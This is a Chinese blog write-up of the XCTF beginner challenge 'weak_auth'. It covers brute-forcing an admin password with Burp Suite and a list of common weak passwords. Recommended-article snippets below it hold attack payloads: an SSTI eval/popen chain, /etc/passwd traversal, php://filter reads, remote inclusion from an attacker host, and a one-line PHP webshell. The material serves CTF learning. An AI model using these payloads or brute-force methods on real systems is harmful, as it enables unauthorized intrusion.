XCTF攻防世界web新手练习_ 7_weak_auth

最新推荐文章于 2025-06-16 21:32:35 发布
原创 最新推荐文章于 2025-06-16 21:32:35 发布 · 2.2w 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文通过XCTF攻防世界web新手练习题“weak_auth”的解决过程,详细讲解了弱密码爆破的方法。包括如何利用burpsuite进行密码爆破,以及弱密码的常见类型,如顺序或重复字符、登录名的一部分、常用单词等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XCTF攻防世界web新手练习—weak_auth

题目

题目为weak_auth,描述信息,重点:随手就设了一个密码
在这里插入图片描述
进入题目,看到需要登录,随便输入一个用户名和密码试试
在这里插入图片描述
弹出弹窗提示用admin账户登录
在这里插入图片描述
于是用确定用户名为admin
F12看看源码,提示需要一个字典,意思是要进行爆破
在这里插入图片描述
于是用burp进行爆破,当密码为123456时返回长度不同
在这里插入图片描述
查看此时返回响应得到flag!
在这里插入图片描述

关于弱密码的爆破

弱密码

弱密码是易于猜测的密码,主要有以下几种:

  • 1. 顺序或重复的字相邻字母: “111111” 、“abcdefg”、 “asdf”、“qwer”键盘上的
  • 2. 使用数字或符号的仅外观类似替换,例如使用数字“1”、“0”替换英文字母“i”、“O”,字符“@”替换字母“a”等;
  • 3. 登录名的一部分:密码为登录名的一部分或完全和登录名相同;
  • 4. 常用的单词:如自己和熟人的名字及其缩写,常用的单词及其缩写,宠物的名字等;
  • 5. 常用数字:比如自己或熟人的生日、证件编号等,以及这些数字与名字、称号等字母的简单组合。

下面是一些常见的弱密码:

admin ——太容易猜出
123 ——同上
abcde ——同上
abc123 ——同上
123456 ——由于文化因素极其常用
1234 ——同上
888888 ——同上
1234567890 ——同上
susan ——常见人名
BarackObama ——高知名度人物
monkey ——常见动物名且正好六位
password ——经常被使用,极易猜出
p@$$\/\/0rd ——简单的字母替换,易被黑客软件破译
rover ——宠物的常用名称,也是一个单词
12/3/75 ——日期
nbusr123 ——可能是用户名,如果是这样的话很容易被猜出
asdf ——常用键盘的键排列
qwerty ——常用键盘的键排列
aaaaa ——重复的字母,极易被破解
Taiwan ——地名
administrator--太容易猜出
用burpsuite进行暴力破解密码

参考 https://blog.youkuaiyun.com/u011781521/article/details/54772795

附上一个字典 https://github.com/rootphantomer/Blasting_dictionary

攻防世界-webweak_auth
weixin_73625393的博客
10-30 571
l选项支持@,%^;解释:生成4个字符形式的字典,选用字符集mixalphanumeric-all-space,输出文件名为w.txt,满足【小写字母+d+小写字母+小写字母】的样式,起始字典为cdab。crunch 4 4 -t @,%^ -o 1.txt -z 7z # 生成四位数的字典,满足【小写字母+大写字母+数字+符号】的形式,输出文件名为1.txt,压缩成7z格式。crunch 6 6 -t @,%%^^# # 生成6位数的字典,满足【小写字母+大写字母+数字+数字+符号+符号】的形式。
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3655
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
XCTF WEB weak_auth
无限迭代中......
06-30 790
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5069 题解:暴力破解 工具:Burp Suite 随便输入下用户名和密码,提示要用admin用户登入,然后跳转到了check.php,查看下check.php的源代码 提示要用字典,那我们用字典(github地址在文末)爆破一...
XCTF-misc-适合作为桌面
最新发布
qq_52273419的博客
06-16 213
得到flag为:flag{38a57032085441e7}用stegsolve打开看到了一个二维码。识别一下二维码得到了一串字符串。保存成pyc文件,反编译一下。感觉是python文件。
攻防世界-weak_auth
HEAVEN569的博客
03-14 1098
题目描述:小宁写了一个登陆验证页面,随手就设了一个密码。 weak_auth:弱认证,就是弱密码,可以通过爆破方式得到密码 1.随便输入一个账号和一个密码 2.发现提示账号是admin,密码不知道,可以通过爆破得到。 所以只需要爆破密码,不需要爆破账号,简单很多 3.开启代理抓包,使用burp suit爆破,发送到爆破模块(send to intruder) 4.进入intruder模块,只添加一个爆破点,就是密码的位置 5.添加密码字典在里面,最后开...
xctf-weak auth
zbbjya的博客
12-14 3619
ll了
6.XCTF weak_auth
山兔的博客
09-16 235
小宁写了一个登陆验证页面,随手就设了一个密码。 打开网站,是一个登录界面,感觉是弱密码。随手输一个,账号:admin,密码:123456。 成了,拿到flag。 去google搜索一下,weak_auth,没搜索到什么东西, 那去百度,只有WP。 上有道,得到 weak auth 弱身份验证 。 说明了题目对我们进行了暗示。 总结:google没搜到的,上百度也没什么用。 ...
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1195
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF 攻防世界 web 新手练习
XQin9T1an的博客
07-24 7686
XCTFweb新手练习题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0 0x01 view_source 题目链接:http://111.198.29.45:51846/ 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 根据题目提示和标题,我们可以...
xctf攻防世界web新手练习区--write up
热门推荐
qq_43081170的博客
07-05 3万+
** 文章目录 ** view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 打开题目后显示FLAG is not here,而且题目描述提示鼠标右键不管用了。这时想到F12键打开开发者工具,查看器可以查看页面源代码。F12----查看器直接得到答案。 get post **题目描述:**X老师告诉小宁同学HTTP通常使用两种请求方法,你...
攻防世界 weak_auth
weixin_68416970的博客
12-26 273
攻防世界平台 web题库矩阵 新手模式 weak_auth
攻防世界weak_auth
2302_78972359的博客
05-04 500
将下载的字典载入,因为我们选择的是简单清单(Simple List),需要我们自己载入字典作为载荷,然后开始攻击。注释里有一句“可能你需要一个字典”,再结合题目weak_auth(弱认证),我们需要对密码进行爆破。观察长度不一样的载荷,点击长度,会自动定位到长度不同的载荷,查看437长度的响应,flag就在里面。拦截启动后点击登录,BP拦截数据包后将数据发给测试器。将admin两边的&去掉,因为我们只需要爆破密码。设置payloads,字典可以从网上下载,或者点。回显让我们以admin登录,重新输入。
攻防世界——weak_auth
weixin_73668856的博客
11-22 351
web新手
XCTF_Web_新手练习区:weak_auth
1stPeak's Blog
06-13 2353
第九题:weak_auth 目标: 了解弱口令,掌握爆破方法 Writeup (1)打开目标网址,发现需要登陆,于是我们输入账号密码信息 (2)于是我们随便输入一个账号密码登陆测试,出现如下所示 (3)看到上图所示,我们使用admin账户进行登陆,密码自己猜一个(这里我猜的是admin) (4)结果也是失败,但是从结果显示可以看出,我们可以对密码进行爆破 (5)我们查看了chec...
攻防世界——weak_auth(NO.GFSJ0482)
hhsjjsj的博客
09-11 1271
接下来进入poloads,在payloads模块加入你自己的字典,,这里我是随便输入了一些,因为我已经做过了,知道密码是123456,所以这里只是演示一下。等待程序运行完成后,通过长度来对比出不同的项目,可以看出来123456的length值跟其他的不一样,因此我们可以试一试密码是否为123456。我们先随便输入一些内容,可以看见页面的弹窗,提示我们用admin登录,那我们知道账号了,接下来就可以直接爆破密码了。结合题目内容,可以判断出来这是弱口令类型的,那么我们只需要暴力破解就行。
XCTF web新手 weak_auth
Activeclown的博客
04-26 557
1.题目描述:小宁写了一个登陆验证页面,随手就设了一个密码。 2.题目分析:根据用户名、密码登录页面从而获取FLAG值 3.解题过程 进入系统给的做题链接 一个登陆界面,根据题目名字weak_auth,首先想到试一波弱密码 试了常用的弱密码 username:admin password:123456 获取到了FLAG值 FLAG:cyberpeace{10e232ba626ba1368da...
攻防世界 web weak_auth
Emjl__的博客
05-09 380
打开题目,发现一个拥有账号密码的登录验证界面。 没有任何提示,那我们就只能先对它进行爆破。 使用burpsuite对其进行抓包
xctf web_php_include
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE['language']; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET['cmd']);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值